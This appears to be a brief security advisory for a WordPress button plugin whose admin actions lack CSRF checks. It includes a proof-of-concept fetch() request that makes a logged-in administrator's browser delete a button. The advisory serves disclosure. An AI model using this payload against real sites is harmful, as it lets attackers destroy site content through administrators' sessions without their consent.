Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
Make a logged in admin open a page with the code below (where <>
is an existing button): fetch("https://example.com/wp-admin/admin.php?page=simple-buttons", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'method=delete&id;=<>', "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));